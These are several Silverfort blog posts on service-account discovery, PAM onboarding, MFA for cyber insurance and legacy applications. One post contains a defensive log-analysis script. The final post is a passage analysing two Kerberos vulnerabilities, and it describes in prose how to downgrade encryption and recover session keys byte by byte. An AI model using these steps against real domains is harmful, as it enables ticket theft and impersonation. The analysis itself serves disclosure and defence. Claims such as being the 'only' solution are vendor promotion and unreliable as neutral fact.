This is the first time that all the knowledge of the service accounts' inventory, type, behavior, and machine interaction is made available without effort, giving identity teams the ability to make an informed decision about which service accounts to place in the PAM vault and subject to password rotation, without fear of breaking app performance or the operational processes the account performs. Even following this discovery, there might be service accounts that still cannot be vaulted – for example, ones that are hardcoded in legacy systems – and these would also need protection. Silverfort enables organizations to protect these accounts with dedicated access policies that block their access when abused by attackers.

### The Silverfort Four-Step PAM Acceleration Path

Here are the four steps you can implement with Silverfort to accelerate the PAM program without delaying the deployment process:

- Privileged and Service Accounts Discovery: Discover all admin accounts (including Shadow Admins) and service accounts (including undocumented or misclassified ones) and gain real-time insights into their access attempts, authentications, and risk level.
- Account Dependencies Mapping: Leverage Silverfort's automated discovery of privileged accounts and visibility into all their authentication and access activity to easily map all the sources and destinations where they are used, including hidden apps, processes, scheduled tasks, etc.
- PAM Onboarding: After completing the discovery and dependency mapping (which takes place automatically within a few weeks), use this information to properly onboard all admin users and service accounts to the PAM vault without causing operational disruption.
- Enforcing Complementary Controls: Apply access policies for the onboarded accounts to protect against PAM bypass attacks, as well as for any admin and service accounts you've decided not to vault, ensuring that all your privileged accounts are resilient to compromise.
Organizations that implement these four steps in their PAM program can rest assured that all their privileged accounts are now protected. To learn more about how Silverfort can help accelerate your PAM program, request a demo here.

---

- Published: 2022-11-22
- Modified: 2025-04-14
- URL: https://www.silverfort.com/blog/the-security-risks-of-service-accounts-why-cyber-insurance-underwriters-are-tightening-requirements/

As ransomware attacks continue to skyrocket, both in frequency and intensity, underwriters of cyber insurance policies have been dramatically tightening their requirements in order to stem financial losses. Over the past three years, for example, the number of claims related to cyberattacks has doubled, with insurance companies posting a record-high 72% cyber loss ratio in 2020. Meanwhile, ransomware attacks rose 105 percent last year, to 623.3 million attacks globally, with the average payout now costing $570,000.

In response, insurers have been revamping their cyber insurance policies to be much more specific about which security controls must be in place. The first major change came last year, when companies began mandating that multi-factor authentication (MFA) controls be enforceable across numerous systems in the environment, including cloud-based email, remote network access, and admin access to directory services, backup environments, and network infrastructure. Recently, underwriters have gone one step further, with many of them also requiring that all privileged accounts be protected. This post examines why insurance companies are now focused on these accounts in general and specifically on a subset of privileged accounts: service accounts.

### The Link Between Ransomware Attacks and Service Accounts

Threat actors have increasingly been using a particularly stealthy tactic to move freely across an environment: lateral movement.
Lateral movement is the stage of an attack that comes after initial access, where attackers make use of compromised user credentials to access as many machines as possible in order to maximize the attack's payoff by encrypting multiple machines simultaneously. Successful ransomware attacks often make use of a compromised service account, which is a non-human account used for machine-to-machine (M2M) communication that performs a critical process (such as a network scan or a software update) repeatedly and automatically. These accounts are very attractive targets for attackers since they are usually highly privileged, with admin-level access to numerous systems.

Several recent high-profile cyberattacks, in fact, have involved a compromised service account, including the SolarWinds Hack of 2021 and the Uber Breach earlier this year.

### Security Challenges of Service Accounts

Service accounts are especially vulnerable to compromise for two important reasons. First, they often have low visibility, since there is no diagnostic tool that can discover them and monitor their behavior. Second, service accounts are typically excluded from password rotation, as they are often embedded within scripts. The upshot is that once one of these accounts is compromised, an attacker will be able to move around an environment undetected and for an unlimited amount of time. This is exactly why insurers, concerned about service accounts, have recently started requiring companies to conduct inventories as well as put in place specific security measures to prevent attackers from using them for malicious access.
### The New Requirements to Obtain a Cyber Insurance Policy

Among the requirements companies must now meet are the following:

- There is an inventory of all privileged service accounts, updated at least quarterly, including what each service account is used for and why it requires domain admin entitlements.
- Service accounts are tiered so that different accounts are used to interact with workstations, servers, and authentication servers.
- Service accounts are configured using the principle of least privilege and to deny interactive logins.
- There is a process in place to regularly review the requirements for each privileged service account to verify that it still requires the permissions it has.
- There are steps being taken to mitigate any exposure the service accounts' configuration creates that could result in credential harvesting.
- Specific monitoring rules are in place for service accounts to alert the Security Operations Center (SOC) of any abnormal behavior.

These requirements present serious challenges to companies seeking a new (or looking to renew an existing) cyber insurance policy. As mentioned, there is no utility that can generate a report of all current service accounts, which means organizations may find it impossible to produce an accurate count of them and demonstrate a full accounting of their behavior. But even for companies with up-to-date records, configuring specific policies to monitor all service account behavior would be extremely labor-intensive and a huge drain on IT resources. Furthermore, putting steps in place to protect service accounts from compromise is complicated at best, since rotating the passwords of service accounts can break critical processes.

### How Silverfort Enables Companies to Meet the Service Account Requirements

Fortunately, the Silverfort Unified Identity Protection platform was developed to address exactly these issues – and can help companies meet the cyber insurance requirements for service accounts.
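As an added illustration of the inventory and monitoring requirements listed above, and of the discovery and dependency-mapping steps described in the PAM post earlier on this page (example code written for this page, not Silverfort's engine): the script classifies accounts in a constructed authentication log as service accounts by their repetitive, non-interactive machine-to-machine pattern, records each one's source-to-destination dependencies, and raises SOC alerts when a known service account logs on interactively or reaches a host it never used before. The log format, host names and thresholds are constructed assumptions.

```python
"""Added example (not Silverfort's code): discovering service accounts in an
authentication log by their repetitive machine-to-machine pattern, mapping each
one's source/destination dependencies, and alerting when a known service account
departs from that pattern. Log format, host names and thresholds are constructed."""
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from statistics import mean, pstdev


@dataclass
class Event:
    time: datetime
    account: str
    source: str
    destination: str
    logon_type: str   # "network" (machine-to-machine) or "interactive"


@dataclass
class Profile:
    times: list = field(default_factory=list)
    logon_types: set = field(default_factory=set)
    # Dependency map: source host -> destinations reached from it.
    dependencies: dict = field(default_factory=lambda: defaultdict(set))


MIN_EVENTS = 4     # fewer events than this is too little to judge regularity
MAX_GAP_CV = 0.1   # max coefficient of variation of the gaps between authentications
MAX_SOURCES = 2    # a service account normally runs from one or two hosts

# Constructed log: "<ISO time> <account> <source host> <destination> <logon type>".
SAMPLE_LOG = """\
2022-11-01T02:00:03 svc_backup app01 sql01 network
2022-11-01T03:00:01 svc_backup app01 sql01 network
2022-11-01T04:00:05 svc_backup app01 sql01 network
2022-11-01T05:00:02 svc_backup app01 sql01 network
2022-11-01T06:00:04 svc_backup app01 sql01 network
2022-11-01T02:30:00 svc_scan scanner01 ws-1001 network
2022-11-01T02:30:10 svc_scan scanner01 ws-1002 network
2022-11-01T02:30:20 svc_scan scanner01 ws-1003 network
2022-11-01T02:30:30 svc_scan scanner01 ws-1004 network
2022-11-01T02:30:40 svc_scan scanner01 ws-1005 network
2022-11-01T08:12:44 j.doe ws-0412 file01 interactive
2022-11-01T09:47:10 j.doe ws-0412 mail01 network
2022-11-01T13:05:55 j.doe ws-0412 file01 network
2022-11-01T16:21:09 j.doe ws-0412 sql01 network
"""


def parse_log(text: str) -> list:
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, account, src, dst, logon = line.split()
            events.append(Event(datetime.fromisoformat(ts), account, src, dst, logon))
    return events


def build_profiles(events: list) -> dict:
    profiles = defaultdict(Profile)
    for ev in sorted(events, key=lambda e: e.time):
        p = profiles[ev.account]
        p.times.append(ev.time)
        p.logon_types.add(ev.logon_type)
        p.dependencies[ev.source].add(ev.destination)
    return profiles


def looks_like_service_account(p: Profile) -> bool:
    """Repetitive, machine-like behavior: never interactive, few source hosts,
    and near-constant gaps between authentications."""
    if "interactive" in p.logon_types or len(p.times) < MIN_EVENTS:
        return False
    if len(p.dependencies) > MAX_SOURCES:
        return False
    gaps = [(b - a).total_seconds() for a, b in zip(p.times, p.times[1:])]
    avg = mean(gaps)
    return avg > 0 and pstdev(gaps) / avg < MAX_GAP_CV


def discover_service_accounts(text: str) -> dict:
    """Inventory: {account: {source host: sorted destinations}} for service accounts."""
    profiles = build_profiles(parse_log(text))
    return {acct: {src: sorted(dsts) for src, dsts in p.dependencies.items()}
            for acct, p in profiles.items() if looks_like_service_account(p)}


def check_event(inventory: dict, ev: Event) -> list:
    """Monitoring rule: deviations from a service account's known pattern become SOC alerts."""
    if ev.account not in inventory:
        return []          # not a service account; outside this rule's scope
    deps = inventory[ev.account]
    known_destinations = set().union(*deps.values())
    alerts = []
    if ev.logon_type == "interactive":
        alerts.append("interactive logon by service account")
    if ev.source not in deps:
        alerts.append(f"new source host {ev.source}")
    if ev.destination not in known_destinations:
        alerts.append(f"new destination {ev.destination}")
    return alerts


if __name__ == "__main__":
    inventory = discover_service_accounts(SAMPLE_LOG)
    for acct, deps in inventory.items():
        print(acct, deps)
```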
Silverfort gives companies the ability to automatically discover and secure all service accounts in the environment via an AI engine that detects any account that displays repetitive, machine-like behavior. Once detected, Silverfort can then continuously monitor those accounts and all the places they authenticate to, providing security teams with real-time insights into their activity and level of risk. Silverfort also comes with ready-to-use access policies tailored to each service account based on its specific pattern of behavior, with any deviation immediately detected and resulting in either blocked access or an alert sent to the SOC team – thus preventing threat actors from using them in lateral movement attacks. In addition to rule-based policies, adaptive risk-based policies can be easily created to activate as the risk level of an account increases. This level of granular protection means that service accounts can be fully protected without rotating passwords, which can break mission-critical processes.

Here is a summary of the capabilities Silverfort provides around service accounts:

With Silverfort in place, organizations will find meeting the new requirements around service accounts to be painless and straightforward, allowing them to qualify for a cyber insurance policy and regain peace of mind. To learn more, request a demo here.

---

- Published: 2022-11-17
- Modified: 2025-04-16
- URL: https://www.silverfort.com/blog/cyber-insurance-mfa-5-things-every-broker-should-know/

The surge in ransomware attacks has led leading underwriters to raise the bar for renewal or purchase of cyber insurance policies. Customers are now required to deploy various security measures, such as multi-factor authentication (MFA). As a result, cyber insurance brokers – the ones that actually sell the policies – are tasked with finding an MFA solution that can both satisfy underwriters' requirements and be easily adopted by their customers.
However, this is not as easy a task as one might think. This article provides brokers with a definitive list of questions they should ask themselves when choosing the MFA solution they'll recommend to their customers. If the answer to all of them is 'Yes', the solution is good to go.

Are you a broker reading this article? If so, let's start!

### The Cyber Insurance MFA Companion to Choosing the Right Solution

If you're a broker and you want to sell cyber insurance policies, you must make sure that MFA is deployed in the customer's environment. And the best way to do that is to have an MFA solution that you can recommend to them. In theory, all you need to do is randomly choose one of the many MFA solutions on the market. In practice, however, it's not that easy, because not all MFA solutions are equal. In fact, it's extremely important for you to choose the right MFA solution. A wrong MFA solution, for example, might be too hard to deploy in your customer's environment, or won't be able to provide adequate protection.

The wrong MFA solution can harm you in two ways. The more straightforward way is by not satisfying your underwriter's security requirements, making the customer ineligible for a policy. The other – and possibly worse for you – is that you'll succeed in selling the policy, but your customer will fall victim to a ransomware attack, resulting in a policy claim for which your underwriter will hold you accountable. So how can you single out the best-fit MFA solution for your customers? Here are the top 5 considerations you should bear in mind when choosing your MFA.

### #1 Can the MFA solution be deployed seamlessly and rapidly?

This might come as a surprise to you, but the most important feature of security products is their ease of use, starting from the initial deployment. The rule of thumb is that anything that takes more than a week to get started will end up not implemented at all.
So first and foremost, check whether the MFA vendor can vouch for a fast and sleek deployment process. If the answer is positive, you can proceed to the next item.

### #2 Does the MFA solution cover the internal environment?

This is a classic 'fine print' catch. The underwriter says the customer must have 'MFA'. Now, all MFA solutions without exception can be used for remote connection to the customer environment. However, that's not all your underwriter wants. If you take a closer look into the assessment form's tables and checklists, you'll discover that significant attention is given to connections that take place within the internal environment itself. Not all MFA solutions support this. So, make sure that the one you're evaluating as a recommendation to your customers applies to internal environment use cases – for example, a user who accesses a file server from their computer, or opens a file on a shared network folder.

### #3 Can your customer apply the MFA solution to privileged users' access?

Your underwriter's goal in requiring MFA is to reduce the likelihood of a successful ransomware attack. Ransomware threat actors typically strive to compromise the accounts of your privileged users, since this easily paves their way to any resource in the targeted environment. As a result – and that's more fine print you should consider – your underwriter is especially concerned about the protection of your customers' privileged users and the ability to easily discover who these users are and apply MFA protection to them. The solution you choose must be able to support that.

### #4 Is the MFA solution capable of protecting command-line access?

This question relates again to the underlying root cause for which underwriters started to require MFA in the first place: to nullify attackers' ability to use compromised user credentials to access resources in your customers' environment.
It's important for you to know that there are multiple ways in which this access can be carried out. Some are trivial to protect with MFA, such as Remote Desktop Protocol (RDP), but others are beyond the scope of most commercial MFA solutions, like command-line based tools such as PowerShell and PsExec. Not surprisingly, these are the access methods threat actors prefer to employ, so your MFA solution of choice must be able to cover them as well.

#5 Can you enforce it on 100% of authentications and access attempts?

When sailing a boat, a single crack in the hull can sink it even if the rest is whole and intact. Your customers are required to have MFA across 100% of their assets; anything less than that leaves a gap an attacker can use. The MFA solution you pursue must be able to vouch for complete coverage to satisfy your underwriter's requirements, and to reach this coverage rapidly and easily.

Silverfort MFA – One Solution for all Cyber Insurance Requirements

Silverfort has pioneered the first Unified Identity Protection platform that can enforce MFA protection across all users, systems, and environments. Silverfort MFA has been embraced by top underwriters and hundreds of customers that sought to renew their existing cyber policies or purchase new ones. The following table shows how Silverfort addresses all the key capabilities underwriters require:

Offering Silverfort to your customers is the safest and most rapid path to add another customer's cyber policy purchase to your portfolio. Visit our website to learn more about Silverfort's MFA protection for cyber insurance or download this eBook to learn more.

---
- Published: 2022-11-10
- Modified: 2025-04-16
- URL: https://www.silverfort.com/blog/silverfort-your-one-stop-mfa-solution-for-cyber-insurance-compliance/

The past couple of years have brought major changes to cyber insurance policies.
Notably, almost all brokers now require multi-factor authentication (MFA) across on-prem and cloud resources. This introduces a severe challenge for small and mid-sized organizations, since standard MFA solutions cannot deliver the required coverage, and deploying a PAM solution is typically beyond the scope of their operational capacity and security skill set. The Silverfort Unified Identity Protection platform is the only solution that can consolidate compliance with the full cyber insurance MFA requirements checklist without requiring agents or proxies, making it an ideal choice for any organization that seeks to purchase or renew its cyber insurance policy.

What is MFA and what are its benefits?

Multi-factor authentication, commonly referred to as MFA, is a security measure that adds a layer of protection on top of the traditional username and password combination. It requires users to provide more than one form of verification, drawn from something they know (e.g., a password), something they have (e.g., a mobile device or hardware token), and something they are (e.g., biometric data). Implementing MFA offers a wide range of advantages that significantly enhance cybersecurity. Let's explore these benefits in detail:

Strengthened Authentication: MFA greatly enhances authentication security. By requiring multiple forms of verification, attackers find it considerably harder to gain unauthorized access. Even if a password is compromised, the additional factors serve as a further barrier protecting sensitive information.

Mitigation of Credential-Based Attacks: In the cyber threat landscape, password breaches and credential theft are all too common. MFA plays a crucial role in mitigating such attacks. Even if an attacker obtains user credentials, they would still need the additional factors to complete the authentication process, effectively thwarting unauthorized access attempts.
Defense against Phishing: Phishing attacks, in which cybercriminals deceive users into divulging their credentials, pose a significant threat. MFA is a strong defense against them: even if users unknowingly disclose their passwords, the additional authentication factor stops attackers from progressing further, safeguarding sensitive data. The caveat is that the strength of this defense depends on the factor. One-time codes and push approvals can themselves be phished or relayed in real time, whereas phishing-resistant factors such as FIDO2 security keys bind the authentication to the legitimate site and cannot.

Compliance with Regulations: Various industries and government organizations have implemented rigorous data protection regulations, and MFA is often mandated as a security measure to comply with them. By implementing MFA, organizations demonstrate their commitment to meeting compliance standards and protecting valuable information from unauthorized access.

Enhanced User Experience: Security measures take priority, but user experience is essential too. Modern MFA solutions offer seamless and user-friendly experiences. With intuitive interfaces and various authentication methods, such as push notifications or biometrics, the authentication process becomes convenient for users without compromising security.

Safeguarding Cyber Insurance Policies: MFA plays a vital role in the context of cyber insurance. Insurers recognize the effectiveness of MFA in reducing the risk of cyber incidents. By implementing MFA, organizations demonstrate a proactive approach to strengthening their security posture, which may lead to more favorable insurance terms.

Why do insurers require Multi-Factor Authentication (MFA)?

Organizations are now required by cyber insurers to adopt MFA as a fundamental condition of their policies. This requirement stems from the fact that MFA strengthens security, mitigates risk, demonstrates a commitment to security, satisfies industry standards, and addresses emerging threats.
Through the mandate of MFA, insurers aim to promote proactive risk management and encourage organizations to adopt robust security measures in order to protect themselves from cyber attacks. Implementing MFA not only aligns with insurers' risk management strategies but also helps organizations enhance their overall security posture in an increasingly complex cyber landscape.

The Cost of a Cyber Attack vs. The Cost of a Cyber Insurance Policy

Understanding the potential financial impact of a cyberattack and weighing it against the cost of a cyber insurance policy is crucial for making informed decisions. Several factors contribute to the financial consequences of a cyber attack, including:

Direct Financial Losses: This includes expenses related to system recovery, data restoration, and potential ransom payments. It also encompasses financial losses resulting from business interruption, such as lost revenue or diminished customer trust.

Legal and Regulatory Consequences: Following a cyberattack, organizations may face legal and regulatory consequences, including legal defense costs, regulatory fines and penalties, and potential lawsuits from affected parties.

Reputational Damage: A cyberattack can severely damage an organization's reputation, leading to a loss of customer trust and loyalty. Rebuilding a brand's reputation can be a complicated and costly process, requiring public relations efforts, marketing campaigns, and outreach initiatives to customers.

Incident Response and Remediation: Organizations must invest in incident response capabilities, forensic investigations, and remediation efforts to identify the attack's root cause, mitigate further damage, and strengthen security measures. These activities often require specialized expertise and can be financially burdensome.
At the same time, the cost of a cyber insurance policy varies based on several factors, including the insured organization's size, nature, security posture, industry sector, and coverage limits. Other factors that influence policy costs include:

Risk Assessment: Insurers conduct risk assessments to evaluate an organization's exposure to cyber threats. A number of factors are taken into account, including security controls, multi-factor authentication, incident response capabilities, and historical breach data. Due to their increased exposure, higher-risk organizations may be subject to higher premiums.

Coverage and Limits: The breadth of coverage and the policy limits affect the cost of the policy. Premiums for policies that provide comprehensive coverage, including business interruption, legal expenses, and reputational damage, are generally higher. Higher policy limits also contribute to increased costs.

Loss History: An organization's history of cyber incidents plays a role in determining policy costs. Organizations with a track record of frequent or severe cyber incidents may face higher premiums due to the perceived higher risk.

Risk Management Measures: Insurers assess the effectiveness of an organization's risk management measures, including security controls and incident response protocols. Organizations with robust security practices may be eligible for discounts or lower premiums.

Investing in a cyber insurance policy provides financial protection in the event of a breach, mitigating direct financial losses, legal expenses, and reputational damage. It also provides access to resources such as incident response teams and legal expertise, which can be extremely valuable during a cyber crisis. By carefully evaluating the potential financial impact of a cyberattack and weighing the costs and benefits of a cyber insurance policy, organizations can make well-informed decisions to protect their interests.
The Cyber Insurance Landscape

While cyber insurance is of course a pivotal element in ensuring your company is able to recover from a cyber attack, an overlooked benefit is that the prerequisites required for cyber insurance compliance can help prevent attacks from occurring in the first place. In response to the massive 245% uptick in ransomware attacks in 2021 (causing $21 billion in losses in the US alone), cyber insurance companies are taking greater precautions by rolling out a detailed list of new requirements for cyber liability compliance. In particular, a new set of MFA guidelines is now being required by the top cyber insurance providers, using the following MFA form:

The common notion within IT and security teams is that fully complying with this checklist is more than challenging. Let's take a closer look to understand why.

Cyber Insurance Coverage: MFA Checklist

MFA for Office 365 and other Cloud-Based Email – Easy to Find
Most cloud-based email providers, such as Office 365, offer MFA functionality, often as a native component of their product. Even when that's not the case, adding MFA protection to a SaaS or web application is a trivial task.

MFA for VPN Access – Easy to Find
For VPN connections, adding MFA is quite simple. If the VPN provider itself doesn't offer an MFA option, any LDAP or RADIUS-enabled VPN can have MFA added via a third-party provider.

MFA for all Remote and Internal Admin Access – Problematic
Here is where complying with the requirements becomes more complicated. While standard MFA solutions can cover some of these use cases, none can cover all of them. Let's explore each of these sub-requirements:

MFA for AD, MFA for PowerShell, MFA for PsExec – Partial Availability Only
Industry-leading MFA solutions deliver only partial protection for remote access to on-prem directory services.
While there are MFA products for RDP access, none can cover command-line tools such as PsExec, PowerShell, or WMI, creating a critical gap both in actual protection and in complying with the cyber insurance requirements.

MFA for all Network Backup Environments – Partial Availability Only
Dedicated backup solutions, whether in the form of virtual appliances or cloud storage, typically support MFA. However, if the backup environment is an on-prem server, it is subject to the same limitations we've just described; in fact, there have been various ransomware attacks lately in which these servers themselves were hit and encrypted.

MFA for Access to Network Infrastructure (routers, switches, firewalls, etc.) – Partial Availability Only
In the case of routers and switches, the question is whether they can interface with RADIUS or TACACS+; if so, adding MFA is rather simple. If your infrastructure doesn't support these interfaces, it might be time for an upgrade. Most modern firewalls also support adding MFA to their administrative authentication, so there should be no problem there.

MFA for Active Directory-Managed Endpoints/Servers – Partial Availability Only
The problem here is similar to the one with MFA for directory services: there is no generally available solution that enforces MFA on Active Directory-managed endpoints and servers. The single exception is RDP and local login, but no such protection exists for the command-line remote access tools we've outlined above.

PAM Solutions are Out-of-Scope for Small to Midsized Organizations
It may be that the drive behind the new MFA checklist was to push organizations to adopt Privileged Access Management (PAM), assuming this approach would raise their protection level and increase their resilience against cyberattacks.
However, when surveyed about the reasons they don't use PAM in their organizations, IT and cybersecurity analysts most commonly pointed to the heavy burden of PAM's implementation cost, maintenance and ongoing operation. In other words, PAM is out of scope for small to mid-sized enterprises. So, while in theory PAM could deliver the protection insurers seek for their insured customers, it's not a practical solution in real life.

Silverfort: The Catch-All MFA Solution

While standard MFA solutions are able to cover some of the use cases required by cyber insurance, none can protect all of them. Since insurers themselves name ransomware as one of their top concerns, we'll use it to demonstrate this claim: ransomware propagates through attacked networks using command-line tools like PsExec, PowerShell and others, and no other MFA solution can cover these access interfaces. The Silverfort Unified Identity Protection platform is the only solution that enforces MFA from the back end of the identity providers rather than through agents or proxies on the individual resources. In practice this means that Silverfort can protect with MFA any user account that authenticates to an on-prem or cloud directory in the environment. Not only does Silverfort protect internal and remote admin access in the on-prem environment (which no other solution does), it also enables customers to consolidate all their MFA protections in a single solution, making it a natural answer to cybersecurity compliance standards.

Bottom Line: MFA Authentication Across All Your Resources Will Make You More Secure

We get it: cyber security insurance renewals are always frustrating, and especially now that providers have added so many new requirements for compliance.
Between deciphering the vague wording of these prerequisites, finding solutions to protect every company asset with MFA, and getting users on board with large-scale changes, it's no small ordeal, especially in the short timeframes given by cyber liability providers. On the other hand, these changes signal a substantial shift towards a future where enterprises are much better prepared against cyberattacks. Implementing MFA across all resources in the organization is a huge step towards a better security posture. And...

---
- Published: 2022-11-09
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/the-mfa-blind-spot-of-legacy-applications/

Despite the surge over the past few years to move all resources to the cloud, the use of legacy, on-prem applications isn't disappearing. In a typical enterprise, these applications support day-to-day operational processes in almost all verticals, from finance and manufacturing to healthcare and hospitality. While legacy applications are vital for organizations to function, they do introduce security risks. One of the most prominent is in the identity attack surface, as legacy applications typically don't support MFA protection. This makes legacy applications a gaping blind spot in an organization's security architecture, exposing its sensitive data to any threat actor that obtains compromised user credentials. This post examines the identity security implications of legacy applications and how to fix the MFA blind spot with these applications.

What are Legacy Applications?

The typical organization uses many different types of applications to run its day-to-day operations. A considerable number of these applications are known as 'legacy': while based on older technologies, they are still part of the organization's operations. In many cases, the operational overhead and cost of migrating these applications to the cloud is too high, making them a permanent on-prem resource.
They also introduce various security issues, as they were not designed for today's security controls and best practices. From the identity protection aspect, legacy applications do not support MFA protection, leaving them exposed to threat actors that employ compromised credentials in their attacks. This MFA gap creates a blind spot in organizations' security architecture, preventing them from efficiently protecting the sensitive data in these apps, and the operational continuity that relies on them, against incoming attacks. This risk is increasingly drawing security stakeholders' attention to the need for comprehensive MFA protection for legacy applications.

Why Can't Legacy Applications be Protected with MFA?

Legacy applications were developed long before MFA technology was widely available, so they don't natively support it in their default authentication process. To integrate MFA into a legacy application, organizations would need to change the application's code, which could disrupt operational continuity; most organizations therefore don't consider it a viable option. Moreover, legacy applications typically authenticate to Active Directory over the NTLM and Kerberos protocols, which, unlike the modern authentication protocols that SaaS and web applications use, have no built-in notion of a second factor. This leaves legacy applications without a practical MFA protection option.

Lack of MFA on Legacy Apps Exposes Organizations to Data Loss and Disruption of Operations

MFA is the most effective security measure in blocking threat actors from using compromised credentials for malicious access. According to Microsoft, MFA can block over 99.9 percent of account compromise attacks. The steep increase in this type of attack, which is seen in 82 percent of data breaches and ransomware attacks, makes the lack of MFA protection for legacy apps a critically exposed attack surface. How does this exposure translate into an actual scenario?
Once a threat actor has infiltrated a targeted environment and compromised a set of valid credentials, they gain uninterrupted access to the legacy apps and everything they contain. This access would be followed by either exfiltration of sensitive IP or extortion under threat of shutting down operations. Furthermore, not placing MFA protection on legacy applications can create compliance issues for organizations that seek to meet their industry's regulatory frameworks and cyber insurance requirements.

Current Identity Protection Alternatives are Not Enough

Some organizations attempt to compensate for the deficit in MFA coverage by closely monitoring users' access and activity on their legacy apps to capture any anomalies that might indicate a compromise. However, this approach has two main flaws. First, it is reactive by nature, always responding to detected threats rather than preventing them. Secondly, it is extremely resource-heavy, requiring a manual integration of the legacy app into a SIEM or other centralized log collector, as well as a fully staffed security team to perform the actual monitoring. This makes it an impractical choice for most organizations. As we've explained before, rewriting the apps' code or migrating them to the cloud is also not an option. So it seems we've reached an impasse: on one hand MFA is required, but on the other it seems impossible. How can that be solved?

The Solution: Silverfort's Unified Identity Protection MFA

Silverfort has pioneered the world's first Unified Identity Protection platform that extends MFA and modern identity security to any user and resource, including the legacy applications that couldn't be protected before. This architecture sidesteps the question of whether the application natively supports MFA, because the only thing that matters is whether it authenticates to AD.
If it does, which is the case for most if not all legacy applications, then Silverfort can analyze the authentication, trigger MFA if needed, and pass the verdict to AD, as described next. Once the Silverfort platform is installed in the environment, Active Directory forwards every incoming access request for risk analysis prior to allowing or denying access. Silverfort's risk engine inspects the access attempt and determines whether it can be trusted or whether MFA verification is required. If further verification is needed, Silverfort connects to the MFA service, either its own or any third-party one, and challenges the user to prove their identity. Based on the response, Silverfort tells AD whether the access request can be trusted or not. In this way, Silverfort overcomes all the challenges we've described in the previous sections:

- It doesn't require any code changes to the app itself.
- It doesn't require installing any agents on the app's servers.
- It covers all access attempts that utilize Active Directory.
- It provides proactive, real-time prevention of any attempt to use compromised credentials to access the legacy app.

Learn more about MFA blind spots and how to protect them in Silverfort's eBook: Re-evaluate your MFA Protection.

---
- Published: 2022-10-31
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/technical-analysis-of-cve-2022-33679-and-cve-2022-33647-kerberos-vulnerabilities/

Written by Yoav Iellin and Dor Segal, Researchers at Silverfort

Microsoft's September 2022 Patch Tuesday included two high-risk elevation of privilege vulnerabilities in Kerberos, discovered by Google Project Zero. Both take advantage of the ability to force Kerberos to downgrade its encryption type from the default AES to the outdated RC4-MD4. Once the encryption is downgraded, the two vulnerabilities come into play and enable an attacker to abuse weaknesses in RC4-MD4.
The first, CVE-2022-33679, allows an attacker to obtain an authenticated session on behalf of the victim, which can lead to arbitrary code execution. The second, CVE-2022-33647, allows an attacker who has already achieved a man-in-the-middle position to obtain Kerberos service tickets on behalf of the target user, thus gaining the same privileges as that user. It's important to note that while both vulnerabilities target weaknesses in the legacy RC4-MD4 encryption type, each abuses a different weakness, resulting in different prerequisites and attack scenarios. This article includes a detailed technical analysis of both CVE-2022-33679 and CVE-2022-33647.

CVE-2022-33679 – Vulnerability Analysis

CVE-2022-33679, for which a proof of concept was recently released, resides in how Kerberos encrypts its session key and is made possible by Kerberos' support for the outdated RC4-MD4 encryption type. The attack consists of two parts: A) requesting a new TGT using the RC4-MD4 etype, followed by B) breaking the keystream byte by byte.

Exploitation process: obtain a TGT by sending an AS-REQ to the KDC that explicitly requests the RC4-MD4 encryption type. For the attack to succeed, the following two requirements must be met:

- Kerberos must be explicitly downgraded from its default AES encryption to the weaker RC4-MD4. This is what makes the attack possible: the session key RC4-MD4 produces is only 40 bits (5 bytes) long, and RC4 is applied with no IV or salt, so every message encrypted under the same key reuses the same keystream.
- The user object's 'Do not require Kerberos preauthentication' flag must be enabled. This makes it possible to obtain a TGT with an encrypted session key without knowing the user's password. Pre-authentication is the mechanism where the client encrypts the current timestamp with the key derived from the entered password and sends it to the KDC, which validates it before generating a session key and a TGT.
Because of the 'Do not require Kerberos preauthentication' flag, the KDC can be targeted directly and no special attack technique such as man-in-the-middle is required. (In Active Directory this flag is the DONT_REQ_PREAUTH bit, 0x400000, of the account's userAccountControl attribute, so enumerating the accounts that have it set is the first thing to check in your own environment.) After the attacker obtains the AS-REP, its encrypted part contains the TGT session key, which is 40 bits long. Because of the outdated RC4-MD4 encryption type, the attacker can leverage knowledge of the fixed start of the encrypted part to extract 45 bytes of keystream. The attacker can now use this keystream to encrypt a custom pre-authentication timestamp and send it to the KDC in a new AS-REQ; the KDC's verdict tells the attacker whether the keystream guess is correct, and so the remaining bytes of the 40-bit TGT session key can be broken one at a time. This is done by abusing two weaknesses in the KDC's ASN.1 parser to gain limited control over the size of the pre-authentication plaintext:

- The KDC parser ignores a trailing NUL at the end of the object. This lets us append a NUL character to the KerberosTime string, which pushes the plaintext one byte further into the keystream and lets us guess that one byte. We still need to guess four more.
- The KDC parser does not validate that encoded lengths are minimal. An ASN.1 length is represented by 1 to 4 bytes, and the KDC's parser does not enforce the shortest form, so we can represent the timestamp string's length with 1 to 4 bytes as we wish. This lets us enlarge the plaintext even further, pushing the NUL byte to the next position each time and guessing the next keystream byte.

Lastly, the attacker re-encrypts the timestamp with the guessed keystream and validates each guess by sending an AS-REQ with encrypted pre-authentication; the KDC returns an error if the decrypted pre-authentication timestamp is incorrect. When pre-authentication succeeds, the attacker has recovered another byte of the keystream, with at most 256 guesses per byte.
Repeating this process yields all the keystream bytes needed to decrypt the session key stored in the original AS-REP. With the session key, the attacker can request a service ticket for any SPN on behalf of the targeted user.

Figure: flow of breaking the first byte of the AS-REP session key using CVE-2022-33679; the remaining bytes are broken the same way.
Figure: continued attack flow, breaking the last byte and obtaining a new TGT using the broken session key.

Credit: PoC by James Forshaw and Rubeus by GhostPack

CVE-2022-33647 Technical Analysis

Fortunately for the attacker, CVE-2022-33647 works with pre-authentication enabled, unlike CVE-2022-33679. This matters because pre-authentication is enabled by default for every account created in Active Directory. The major requirement for this attack is a man-in-the-middle position between the client and the domain controller (a common attack type with many ways to achieve it, such as DNS spoofing or ARP poisoning). The MITM position is used to force the client to downgrade its encryption to RC4-MD4.

Exploitation flow

When the client sends its first AS-REQ, the KDC responds with a 'pre-authentication required' error. Nothing in the exchange is authenticated at this stage, so the attacker can alter the KDC's response: we modify the encryption types the KDC advertises as supported to RC4-MD4, as shown in the figure. As a result (if RC4 is enabled on the client), the client sends an AS-REQ with pre-authentication encrypted using RC4-MD4. From this point, the attacker has two options:

- Brute force the 5-byte session key, which is inefficient and might take a long time.
- Leverage knowledge of the plaintext, namely the pre-authentication data. In Kerberos, a MITM adversary can closely estimate the plaintext pre-authentication timestamp that the client put in its AS-REQ. The RC4-MD4 encryption mechanism lacks an initialization vector or nonce and ignores the key usage value.
